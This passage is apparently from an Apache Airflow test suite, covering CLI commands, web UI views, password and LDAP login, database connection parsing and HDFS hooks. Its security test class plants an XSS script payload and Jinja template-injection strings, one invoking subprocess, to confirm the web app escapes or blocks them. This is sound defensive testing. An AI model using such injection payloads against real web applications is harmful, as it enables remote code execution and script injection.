def test_process_subdir_path_with_placeholder(self):
self.assertEqual(os.path.join(settings.DAGS_FOLDER, 'abc'), cli.process_subdir('DAGS_FOLDER/abc'))
def test_trigger_dag(self):
cli.trigger_dag(self.parser.parse_args([
'trigger_dag', 'example_bash_operator',
'-c', '{"foo": "bar"}']))
self.assertRaises(
ValueError,
cli.trigger_dag,
self.parser.parse_args([
'trigger_dag', 'example_bash_operator',
'--run_id', 'trigger_dag_xxx',
'-c', 'NOT JSON'])
)
def test_delete_dag(self):
DM = models.DagModel
key = "my_dag_id"
session = settings.Session()
session.add(DM(dag_id=key))
session.commit()
cli.delete_dag(self.parser.parse_args([
'delete_dag', key, '--yes']))
self.assertEqual(session.query(DM).filter_by(dag_id=key).count(), 0)
self.assertRaises(
AirflowException,
cli.delete_dag,
self.parser.parse_args([
'delete_dag',
'does_not_exist_dag',
'--yes'])
)
def test_pool_create(self):
cli.pool(self.parser.parse_args(['pool', '-s', 'foo', '1', 'test']))
self.assertEqual(self.session.query(models.Pool).count(), 1)
def test_pool_get(self):
cli.pool(self.parser.parse_args(['pool', '-s', 'foo', '1', 'test']))
try:
cli.pool(self.parser.parse_args(['pool', '-g', 'foo']))
except Exception as e:
self.fail("The 'pool -g foo' command raised unexpectedly: %s" % e)
def test_pool_delete(self):
cli.pool(self.parser.parse_args(['pool', '-s', 'foo', '1', 'test']))
cli.pool(self.parser.parse_args(['pool', '-x', 'foo']))
self.assertEqual(self.session.query(models.Pool).count(), 0)
def test_pool_no_args(self):
try:
cli.pool(self.parser.parse_args(['pool']))
except Exception as e:
self.fail("The 'pool' command raised unexpectedly: %s" % e)
def test_variables(self):
# Checks if all subcommands are properly received
cli.variables(self.parser.parse_args([
'variables', '-s', 'foo', '{"foo":"bar"}']))
cli.variables(self.parser.parse_args([
'variables', '-g', 'foo']))
cli.variables(self.parser.parse_args([
'variables', '-g', 'baz', '-d', 'bar']))
cli.variables(self.parser.parse_args([
'variables']))
cli.variables(self.parser.parse_args([
'variables', '-x', 'bar']))
cli.variables(self.parser.parse_args([
'variables', '-i', DEV_NULL]))
cli.variables(self.parser.parse_args([
'variables', '-e', DEV_NULL]))
cli.variables(self.parser.parse_args([
'variables', '-s', 'bar', 'original']))
# First export
cli.variables(self.parser.parse_args([
'variables', '-e', 'variables1.json']))
first_exp = open('variables1.json', 'r')
cli.variables(self.parser.parse_args([
'variables', '-s', 'bar', 'updated']))
cli.variables(self.parser.parse_args([
'variables', '-s', 'foo', '{"foo":"oops"}']))
cli.variables(self.parser.parse_args([
'variables', '-x', 'foo']))
# First import
cli.variables(self.parser.parse_args([
'variables', '-i', 'variables1.json']))
self.assertEqual('original', models.Variable.get('bar'))
self.assertEqual('{"foo": "bar"}', models.Variable.get('foo'))
# Second export
cli.variables(self.parser.parse_args([
'variables', '-e', 'variables2.json']))
second_exp = open('variables2.json', 'r')
self.assertEqual(first_exp.read(), second_exp.read())
second_exp.close()
first_exp.close()
# Second import
cli.variables(self.parser.parse_args([
'variables', '-i', 'variables2.json']))
self.assertEqual('original', models.Variable.get('bar'))
self.assertEqual('{"foo": "bar"}', models.Variable.get('foo'))
os.remove('variables1.json')
os.remove('variables2.json')
def _wait_pidfile(self, pidfile):
while True:
try:
with open(pidfile) as f:
return int(f.read())
except:
sleep(1)
def test_cli_webserver_foreground(self):
# Confirm that webserver hasn't been launched.
# pgrep returns exit status 1 if no process matched.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Run webserver in foreground and terminate it.
p = subprocess.Popen(["airflow", "webserver"])
p.terminate()
p.wait()
# Assert that no process remains.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
@unittest.skipIf("TRAVIS" in os.environ and bool(os.environ["TRAVIS"]),
"Skipping test due to lack of required file permission")
def test_cli_webserver_foreground_with_pid(self):
# Run webserver in foreground with --pid option
pidfile = tempfile.mkstemp()[1]
p = subprocess.Popen(["airflow", "webserver", "--pid", pidfile])
# Check the file specified by --pid option exists
self._wait_pidfile(pidfile)
# Terminate webserver
p.terminate()
p.wait()
@unittest.skipIf("TRAVIS" in os.environ and bool(os.environ["TRAVIS"]),
"Skipping test due to lack of required file permission")
def test_cli_webserver_background(self):
import psutil
# Confirm that webserver hasn't been launched.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Run webserver in background.
subprocess.Popen(["airflow", "webserver", "-D"])
pidfile = cli.setup_locations("webserver")[0]
self._wait_pidfile(pidfile)
# Assert that gunicorn and its monitor are launched.
self.assertEqual(0, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(0, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Terminate monitor process.
pidfile = cli.setup_locations("webserver-monitor")[0]
pid = self._wait_pidfile(pidfile)
p = psutil.Process(pid)
p.terminate()
p.wait()
# Assert that no process remains.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Patch for causing webserver timeout
@mock.patch("airflow.bin.cli.get_num_workers_running", return_value=0)
def test_cli_webserver_shutdown_when_gunicorn_master_is_killed(self, _):
# Shorten the timeout so that this test doesn't take too long
configuration.conf.set("webserver", "web_server_master_timeout", "10")
args = self.parser.parse_args(['webserver'])
with self.assertRaises(SystemExit) as e:
cli.webserver(args)
self.assertEqual(e.exception.code, 1)
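# Tests for web UI security behaviour: CSRF rejection/acceptance, XSS escaping
# in the log view, and protection of the chart_data endpoint against Jinja
# template injection.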
class SecurityTests(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
configuration.conf.set("webserver", "authenticate", "False")
configuration.conf.set("webserver", "expose_config", "True")
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
self.dagbag = models.DagBag(
dag_folder=DEV_NULL, include_examples=True)
self.dag_bash = self.dagbag.dags['example_bash_operator']
self.runme_0 = self.dag_bash.get_task('runme_0')
def get_csrf(self, response):
tree = html.fromstring(response.data)
form = tree.find('.//form')
return form.find('.//input[@name="_csrf_token"]').value
def test_csrf_rejection(self):
endpoints = ([
"/admin/queryview/",
"/admin/airflow/paused?dag_id=example_python_operator&is_paused=false",
])
for endpoint in endpoints:
response = self.app.post(endpoint)
self.assertIn('CSRF token is missing', response.data.decode('utf-8'))
def test_csrf_acceptance(self):
response = self.app.get("/admin/queryview/")
csrf = self.get_csrf(response)
response = self.app.post("/admin/queryview/", data=dict(csrf_token=csrf))
self.assertEqual(200, response.status_code)
def test_xss(self):
try:
self.app.get("/admin/airflow/tree?dag_id=<script>alert(123456)</script>")
except Exception:
# an exception is expected here since the dag doesn't exist
pass
response = self.app.get("/admin/log", follow_redirects=True)
self.assertIn(bleach.clean("<script>alert(123456)</script>"), response.data.decode('UTF-8'))
def test_chart_data_template(self):
"""Protect chart_data from being able to do RCE."""
session = settings.Session()
Chart = models.Chart
chart1 = Chart(
label='insecure_chart',
conn_id='airflow_db',
chart_type='bar',
sql="SELECT {{ ''.__class__.__mro__[1].__subclasses__() }}"
)
chart2 = Chart(
label="{{ ''.__class__.__mro__[1].__subclasses__() }}",
conn_id='airflow_db',
chart_type='bar',
sql="SELECT 1"
)
chart3 = Chart(
label="{{ subprocess.check_output('ls') }}",
conn_id='airflow_db',
chart_type='bar',
sql="SELECT 1"
)
session.add(chart1)
session.add(chart2)
session.add(chart3)
session.commit()
chart1 = session.query(Chart).filter(Chart.label == 'insecure_chart').first()
with self.assertRaises(SecurityError):
self.app.get("/admin/airflow/chart_data?chart_id={}".format(chart1.id))
chart2 = session.query(Chart).filter(
Chart.label == "{{ ''.__class__.__mro__[1].__subclasses__() }}"
).first()
with self.assertRaises(SecurityError):
self.app.get("/admin/airflow/chart_data?chart_id={}".format(chart2.id))
chart3 = session.query(Chart).filter(
Chart.label == "{{ subprocess.check_output('ls') }}"
).first()
with self.assertRaises(UndefinedError):
self.app.get("/admin/airflow/chart_data?chart_id={}".format(chart3.id))
def tearDown(self):
configuration.conf.set("webserver", "expose_config", "False")
self.dag_bash.clear(start_date=DEFAULT_DATE, end_date=timezone.utcnow())
class WebUiTests(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
configuration.conf.set("webserver", "authenticate", "False")
configuration.conf.set("webserver", "expose_config", "True")
app = application.create_app()
app.config['TESTING'] = True
app.config['WTF_CSRF_METHODS'] = []
self.app = app.test_client()
self.dagbag = models.DagBag(include_examples=True)
self.dag_bash = self.dagbag.dags['example_bash_operator']
self.dag_python = self.dagbag.dags['example_python_operator']
self.sub_dag = self.dagbag.dags['example_subdag_operator']
self.runme_0 = self.dag_bash.get_task('runme_0')
self.example_xcom = self.dagbag.dags['example_xcom']
self.dagrun_python = self.dag_python.create_dagrun(
run_id="test_{}".format(models.DagRun.id_for_date(timezone.utcnow())),
execution_date=DEFAULT_DATE,
start_date=timezone.utcnow(),
state=State.RUNNING
)
self.sub_dag.create_dagrun(
run_id="test_{}".format(models.DagRun.id_for_date(timezone.utcnow())),
execution_date=DEFAULT_DATE,
start_date=timezone.utcnow(),
state=State.RUNNING
)
self.example_xcom.create_dagrun(
run_id="test_{}".format(models.DagRun.id_for_date(timezone.utcnow())),
execution_date=DEFAULT_DATE,
start_date=timezone.utcnow(),
state=State.RUNNING
)
def test_index(self):
response = self.app.get('/', follow_redirects=True)
resp_html = response.data.decode('utf-8')
self.assertIn("DAGs", resp_html)
self.assertIn("example_bash_operator", resp_html)
# The HTML should contain data for the last run: a link to the specific
# run and the text of its date.
url = "/admin/airflow/graph?" + urlencode({
"dag_id": self.dag_python.dag_id,
"execution_date": self.dagrun_python.execution_date,
}).replace("&", "&amp;")
self.assertIn(url, resp_html)
self.assertIn(
self.dagrun_python.execution_date.strftime("%Y-%m-%d %H:%M"),
resp_html)
def test_query(self):
response = self.app.get('/admin/queryview/')
self.assertIn("Ad Hoc Query", response.data.decode('utf-8'))
response = self.app.post(
"/admin/queryview/", data=dict(
conn_id="airflow_db",
sql="SELECT+COUNT%281%29+as+TEST+FROM+task_instance"))
self.assertIn("TEST", response.data.decode('utf-8'))
def test_health(self):
response = self.app.get('/health')
self.assertIn('The server is healthy!', response.data.decode('utf-8'))
def test_noaccess(self):
response = self.app.get('/admin/airflow/noaccess')
self.assertIn("You don't seem to have access.", response.data.decode('utf-8'))
def test_pickle_info(self):
response = self.app.get('/admin/airflow/pickle_info')
self.assertIn('{', response.data.decode('utf-8'))
def test_dag_views(self):
response = self.app.get(
'/admin/airflow/graph?dag_id=example_bash_operator')
self.assertIn("runme_0", response.data.decode('utf-8'))
# confirm that the graph page loads when execution_date is blank
response = self.app.get(
'/admin/airflow/graph?dag_id=example_bash_operator&execution_date=')
self.assertIn("runme_0", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/tree?num_runs=25&dag_id=example_bash_operator')
self.assertIn("runme_0", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/duration?days=30&dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/tries?days=30&dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/landing_times?'
'days=30&dag_id=example_python_operator')
self.assertIn("example_python_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/landing_times?'
'days=30&dag_id=example_xcom')
self.assertIn("example_xcom", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/gantt?dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/code?dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/blocked')
response = self.app.get(
'/admin/configurationview/')
self.assertIn("Airflow Configuration", response.data.decode('utf-8'))
self.assertIn("Running Configuration", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/rendered?'
'task_id=runme_1&dag_id=example_bash_operator&'
'execution_date={}'.format(DEFAULT_DATE_ISO))
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/log?task_id=run_this_last&'
'dag_id=example_bash_operator&execution_date={}'
''.format(DEFAULT_DATE_ISO))
self.assertIn("run_this_last", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/task?'
'task_id=runme_0&dag_id=example_bash_operator&'
'execution_date={}'.format(DEFAULT_DATE_DS))
self.assertIn("Attributes", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/dag_stats')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/task_stats')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
url = (
"/admin/airflow/success?task_id=print_the_context&"
"dag_id=example_python_operator&upstream=false&downstream=false&"
"future=false&past=false&execution_date={}&"
"origin=/admin".format(DEFAULT_DATE_DS))
response = self.app.get(url)
self.assertIn("Wait a minute", response.data.decode('utf-8'))
response = self.app.get(url + "&confirmed=true")
response = self.app.get(
'/admin/airflow/clear?task_id=print_the_context&'
'dag_id=example_python_operator&future=true&past=false&'
'upstream=true&downstream=false&'
'execution_date={}&'
'origin=/admin'.format(DEFAULT_DATE_DS))
self.assertIn("Wait a minute", response.data.decode('utf-8'))
url = (
"/admin/airflow/success?task_id=section-1&"
"dag_id=example_subdag_operator&upstream=true&downstream=true&"
"future=false&past=false&execution_date={}&"
"origin=/admin".format(DEFAULT_DATE_DS))
response = self.app.get(url)
self.assertIn("Wait a minute", response.data.decode('utf-8'))
self.assertIn("section-1-task-1", response.data.decode('utf-8'))
self.assertIn("section-1-task-2", response.data.decode('utf-8'))
self.assertIn("section-1-task-3", response.data.decode('utf-8'))
self.assertIn("section-1-task-4", response.data.decode('utf-8'))
self.assertIn("section-1-task-5", response.data.decode('utf-8'))
response = self.app.get(url + "&confirmed=true")
url = (
"/admin/airflow/clear?task_id=print_the_context&"
"dag_id=example_python_operator&future=false&past=false&"
"upstream=false&downstream=true&"
"execution_date={}&"
"origin=/admin".format(DEFAULT_DATE_DS))
response = self.app.get(url)
self.assertIn("Wait a minute", response.data.decode('utf-8'))
response = self.app.get(url + "&confirmed=true")
url = (
"/admin/airflow/run?task_id=runme_0&"
"dag_id=example_bash_operator&ignore_all_deps=false&ignore_ti_state=true&"
"ignore_task_deps=true&execution_date={}&"
"origin=/admin".format(DEFAULT_DATE_DS))
response = self.app.get(url)
response = self.app.get(
"/admin/airflow/refresh?dag_id=example_bash_operator")
response = self.app.get("/admin/airflow/refresh_all")
response = self.app.post(
"/admin/airflow/paused?"
"dag_id=example_python_operator&is_paused=false")
self.assertIn("OK", response.data.decode('utf-8'))
response = self.app.get("/admin/xcom", follow_redirects=True)
self.assertIn("Xcoms", response.data.decode('utf-8'))
def test_charts(self):
session = Session()
chart_label = "Airflow task instance by type"
chart = session.query(
models.Chart).filter(models.Chart.label == chart_label).first()
chart_id = chart.id
session.close()
response = self.app.get(
'/admin/airflow/chart'
'?chart_id={}&iteration_no=1'.format(chart_id))
self.assertIn("Airflow task instance by type", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/chart_data'
'?chart_id={}&iteration_no=1'.format(chart_id))
self.assertIn("example", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/dag_details?dag_id=example_branch_operator')
self.assertIn("run_this_first", response.data.decode('utf-8'))
def test_fetch_task_instance(self):
url = (
"/admin/airflow/object/task_instances?"
"dag_id=example_python_operator&"
"execution_date={}".format(DEFAULT_DATE_DS))
response = self.app.get(url)
self.assertIn("print_the_context", response.data.decode('utf-8'))
def tearDown(self):
configuration.conf.set("webserver", "expose_config", "False")
self.dag_bash.clear(start_date=DEFAULT_DATE, end_date=timezone.utcnow())
session = Session()
session.query(models.DagRun).delete()
session.query(models.TaskInstance).delete()
session.commit()
session.close()
class SecureModeWebUiTests(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
configuration.conf.set("webserver", "authenticate", "False")
configuration.conf.set("core", "secure_mode", "True")
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
def test_query(self):
response = self.app.get('/admin/queryview/')
self.assertEqual(response.status_code, 404)
def test_charts(self):
response = self.app.get('/admin/chart/')
self.assertEqual(response.status_code, 404)
def tearDown(self):
configuration.conf.remove_option("core", "SECURE_MODE")
class WebPasswordAuthTest(unittest.TestCase):
def setUp(self):
configuration.conf.set("webserver", "authenticate", "True")
configuration.conf.set("webserver", "auth_backend", "airflow.contrib.auth.backends.password_auth")
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
from airflow.contrib.auth.backends.password_auth import PasswordUser
session = Session()
user = models.User()
password_user = PasswordUser(user)
password_user.username = 'airflow_passwordauth'
password_user.password = 'password'
print(password_user._password)
session.add(password_user)
session.commit()
session.close()
def get_csrf(self, response):
tree = html.fromstring(response.data)
form = tree.find('.//form')
return form.find('.//input[@name="_csrf_token"]').value
def login(self, username, password):
response = self.app.get('/admin/airflow/login')
csrf_token = self.get_csrf(response)
return self.app.post('/admin/airflow/login', data=dict(
username=username,
password=password,
csrf_token=csrf_token
), follow_redirects=True)
def logout(self):
return self.app.get('/admin/airflow/logout', follow_redirects=True)
def test_login_logout_password_auth(self):
self.assertTrue(configuration.conf.getboolean('webserver', 'authenticate'))
response = self.login('user1', 'whatever')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('airflow_passwordauth', 'wrongpassword')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('airflow_passwordauth', 'password')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
response = self.logout()
self.assertIn('form-signin', response.data.decode('utf-8'))
def test_unauthorized_password_auth(self):
response = self.app.get("/admin/airflow/landing_times")
self.assertEqual(response.status_code, 302)
def tearDown(self):
configuration.load_test_config()
session = Session()
session.query(models.User).delete()
session.commit()
session.close()
configuration.conf.set("webserver", "authenticate", "False")
class WebLdapAuthTest(unittest.TestCase):
def setUp(self):
configuration.conf.set("webserver", "authenticate", "True")
configuration.conf.set("webserver", "auth_backend", "airflow.contrib.auth.backends.ldap_auth")
try:
configuration.conf.add_section("ldap")
except Exception:  # the [ldap] section may already exist
pass
configuration.conf.set("ldap", "uri", "ldap://localhost:3890")
configuration.conf.set("ldap", "user_filter", "objectClass=*")
configuration.conf.set("ldap", "user_name_attr", "uid")
configuration.conf.set("ldap", "bind_user", "cn=Manager,dc=example,dc=com")
configuration.conf.set("ldap", "bind_password", "insecure")
configuration.conf.set("ldap", "basedn", "dc=example,dc=com")
configuration.conf.set("ldap", "cacert", "")
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
def get_csrf(self, response):
tree = html.fromstring(response.data)
form = tree.find('.//form')
return form.find('.//input[@name="_csrf_token"]').value
def login(self, username, password):
response = self.app.get('/admin/airflow/login')
csrf_token = self.get_csrf(response)
return self.app.post('/admin/airflow/login', data=dict(
username=username,
password=password,
csrf_token=csrf_token
), follow_redirects=True)
def logout(self):
return self.app.get('/admin/airflow/logout', follow_redirects=True)
def test_login_logout_ldap(self):
self.assertTrue(configuration.conf.getboolean('webserver', 'authenticate'))
response = self.login('user1', 'userx')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('userz', 'user1')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('user1', 'user1')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
response = self.logout()
self.assertIn('form-signin', response.data.decode('utf-8'))
def test_unauthorized(self):
response = self.app.get("/admin/airflow/landing_times")
self.assertEqual(response.status_code, 302)
def test_no_filter(self):
response = self.login('user1', 'user1')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
self.assertIn('Connections', response.data.decode('utf-8'))
def test_with_filters(self):
configuration.conf.set('ldap', 'superuser_filter',
'description=superuser')
configuration.conf.set('ldap', 'data_profiler_filter',
'description=dataprofiler')
response = self.login('dataprofiler', 'dataprofiler')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
response = self.login('superuser', 'superuser')
self.assertIn('Connections', response.data.decode('utf-8'))
def tearDown(self):
configuration.load_test_config()
session = Session()
session.query(models.User).delete()
session.commit()
session.close()
configuration.conf.set("webserver", "authenticate", "False")
class LdapGroupTest(unittest.TestCase):
def setUp(self):
configuration.conf.set("webserver", "authenticate", "True")
configuration.conf.set("webserver", "auth_backend", "airflow.contrib.auth.backends.ldap_auth")
try:
configuration.conf.add_section("ldap")
except Exception:  # the [ldap] section may already exist
pass
configuration.conf.set("ldap", "uri", "ldap://localhost:3890")
configuration.conf.set("ldap", "user_filter", "objectClass=*")
configuration.conf.set("ldap", "user_name_attr", "uid")
configuration.conf.set("ldap", "bind_user", "cn=Manager,dc=example,dc=com")
configuration.conf.set("ldap", "bind_password", "insecure")
configuration.conf.set("ldap", "basedn", "dc=example,dc=com")
configuration.conf.set("ldap", "cacert", "")
def test_group_belonging(self):
from airflow.contrib.auth.backends.ldap_auth import LdapUser
users = {"user1": ["group1", "group3"],
"user2": ["group2"]
}
for user in users:
mu = models.User(username=user,
is_superuser=False)
auth = LdapUser(mu)
self.assertEqual(set(users[user]), set(auth.ldap_groups))
def tearDown(self):
configuration.load_test_config()
configuration.conf.set("webserver", "authenticate", "False")
class FakeWebHDFSHook(object):
def __init__(self, conn_id):
self.conn_id = conn_id
def get_conn(self):
return self.conn_id
def check_for_path(self, hdfs_path):
return hdfs_path
class FakeSnakeBiteClientException(Exception):
pass
class FakeSnakeBiteClient(object):
def __init__(self):
self.started = True
def ls(self, path, include_toplevel=False):
"""
the fake snakebite client
:param path: the array of path to test
:param include_toplevel: to return the toplevel directory info
:return: a list for path for the matching queries
"""
if path[0] == '/datadirectory/empty_directory' and not include_toplevel:
return []
elif path[0] == '/datadirectory/datafile':
return [{
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 0,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/datafile'
}]
elif path[0] == '/datadirectory/empty_directory' and include_toplevel:
return [{
'group': u'supergroup',
'permission': 493,
'file_type': 'd',
'access_time': 0,
'block_replication': 0,
'modification_time': 1481132141540,
'length': 0,
'blocksize': 0,
'owner': u'hdfs',
'path': '/datadirectory/empty_directory'
}]
elif path[0] == '/datadirectory/not_empty_directory' and include_toplevel:
return [{
'group': u'supergroup',
'permission': 493,
'file_type': 'd',
'access_time': 0,
'block_replication': 0,
'modification_time': 1481132141540,
'length': 0,
'blocksize': 0,
'owner': u'hdfs',
'path': '/datadirectory/empty_directory'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 0,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/not_empty_directory/test_file'
}]
elif path[0] == '/datadirectory/not_empty_directory':
return [{
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 0,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/not_empty_directory/test_file'
}]
elif path[0] == '/datadirectory/not_existing_file_or_directory':
raise FakeSnakeBiteClientException
elif path[0] == '/datadirectory/regex_dir':
return [{
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862, 'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/test1file'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/test2file'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/test3file'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/copying_file_1.txt._COPYING_'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/copying_file_3.txt.sftp'
}]
else:
raise FakeSnakeBiteClientException
class FakeHDFSHook(object):
def __init__(self, conn_id=None):
self.conn_id = conn_id
def get_conn(self):
client = FakeSnakeBiteClient()
return client
class ConnectionTest(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
utils.db.initdb()
os.environ['AIRFLOW_CONN_TEST_URI'] = (
'postgres://username:password@ec2.compute.com:5432/the_database')
os.environ['AIRFLOW_CONN_TEST_URI_NO_CREDS'] = (
'postgres://ec2.compute.com/the_database')
def tearDown(self):
env_vars = ['AIRFLOW_CONN_TEST_URI', 'AIRFLOW_CONN_AIRFLOW_DB']
for ev in env_vars:
if ev in os.environ:
del os.environ[ev]
def test_using_env_var(self):
c = SqliteHook.get_connection(conn_id='test_uri')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertEqual('username', c.login)
self.assertEqual('password', c.password)
self.assertEqual(5432, c.port)
def test_using_unix_socket_env_var(self):
c = SqliteHook.get_connection(conn_id='test_uri_no_creds')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertIsNone(c.login)
self.assertIsNone(c.password)
self.assertIsNone(c.port)
def test_param_setup(self):
c = models.Connection(conn_id='local_mysql', conn_type='mysql',
host='localhost', login='airflow',
password='airflow', schema='airflow')
self.assertEqual('localhost', c.host)
self.assertEqual('airflow', c.schema)
self.assertEqual('airflow', c.login)
self.assertEqual('airflow', c.password)
self.assertIsNone(c.port)
def test_env_var_priority(self):
c = SqliteHook.get_connection(conn_id='airflow_db')
self.assertNotEqual('ec2.compute.com', c.host)
os.environ['AIRFLOW_CONN_AIRFLOW_DB'] = \
'postgres://username:password@ec2.compute.com:5432/the_database'
c = SqliteHook.get_connection(conn_id='airflow_db')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertEqual('username', c.login)
self.assertEqual('password', c.password)
self.assertEqual(5432, c.port)
del os.environ['AIRFLOW_CONN_AIRFLOW_DB']
def test_dbapi_get_uri(self):
conn = BaseHook.get_connection(conn_id='test_uri')
hook = conn.get_hook()
self.assertEqual('postgres://username:password@ec2.compute.com:5432/the_database', hook.get_uri())
conn2 = BaseHook.get_connection(conn_id='test_uri_no_creds')
hook2 = conn2.get_hook()
self.assertEqual('postgres://ec2.compute.com/the_database', hook2.get_uri())
def test_dbapi_get_sqlalchemy_engine(self):
conn = BaseHook.get_connection(conn_id='test_uri')
hook = conn.get_hook()
engine = hook.get_sqlalchemy_engine()
self.assertIsInstance(engine, sqlalchemy.engine.Engine)
self.assertEqual('postgres://username:password@ec2.compute.com:5432/the_database', str(engine.url))
def test_get_connections_env_var(self):
conns = SqliteHook.get_connections(conn_id='test_uri')
assert len(conns) == 1
assert conns[0].host == 'ec2.compute.com'
assert conns[0].schema == 'the_database'
assert conns[0].login == 'username'
assert conns[0].password == 'password'
assert conns[0].port == 5432
def test_get_connections_db(self):
conns = BaseHook.get_connections(conn_id='airflow_db')
assert len(conns) == 1
assert conns[0].host == 'localhost'
assert conns[0].schema == 'airflow'
assert conns[0].login == 'root'
class WebHDFSHookTest(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
def test_simple_init(self):
from airflow.hooks.webhdfs_hook import WebHDFSHook
c = WebHDFSHook()
self.assertIsNone(c.proxy_user)
def test_init_proxy_user(self):
from airflow.hooks.webhdfs_hook import WebHDFSHook
c = WebHDFSHook(proxy_user='someone')
self.assertEqual('someone', c.proxy_user)
try:
from airflow.hooks.hdfs_hook import HDFSHook
import snakebite
except ImportError:
HDFSHook = None
@unittest.skipIf(HDFSHook is None,
"Skipping test because HDFSHook is not installed")
class HDFSHookTest(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
os.environ['AIRFLOW_CONN_HDFS_DEFAULT'] = ('hdfs://localhost:8020')
def test_get_client(self):
client = HDFSHook(proxy_user='foo').get_conn()
self.assertIsInstance(client, snakebite.client.Client)
self.assertEqual('localhost', client.host)
self.assertEqual(8020, client.port)
self.assertEqual('foo', client.service.channel.effective_user)
@mock.patch('airflow.hooks.hdfs_hook.AutoConfigClient')
@mock.patch('airflow.hooks.hdfs_hook.HDFSHook.get_connections')
def test_get_autoconfig_client(self, mock_get_connections,
MockAutoConfigClient):
c = models.Connection(conn_id='hdfs', conn_type='hdfs',
host='localhost', port=8020, login='foo',
extra=json.dumps({'autoconfig': True}))
mock_get_connections.return_value = [c]
HDFSHook(hdfs_conn_id='hdfs').get_conn()
MockAutoConfigClient.assert_called_once_with(effective_user='foo',
use_sasl=False)
@mock.patch('airflow.hooks.hdfs_hook.AutoConfigClient')
def test_get_autoconfig_client_no_conn(self, MockAutoConfigClient):
HDFSHook(hdfs_conn_id='hdfs_missing', autoconfig=True).get_conn()
MockAutoConfigClient.assert_called_once_with(effective_user=None,
use_sasl=False)
@mock.patch('airflow.hooks.hdfs_hook.HDFSHook.get_connections')
def test_get_ha_client(self, mock_get_connections):
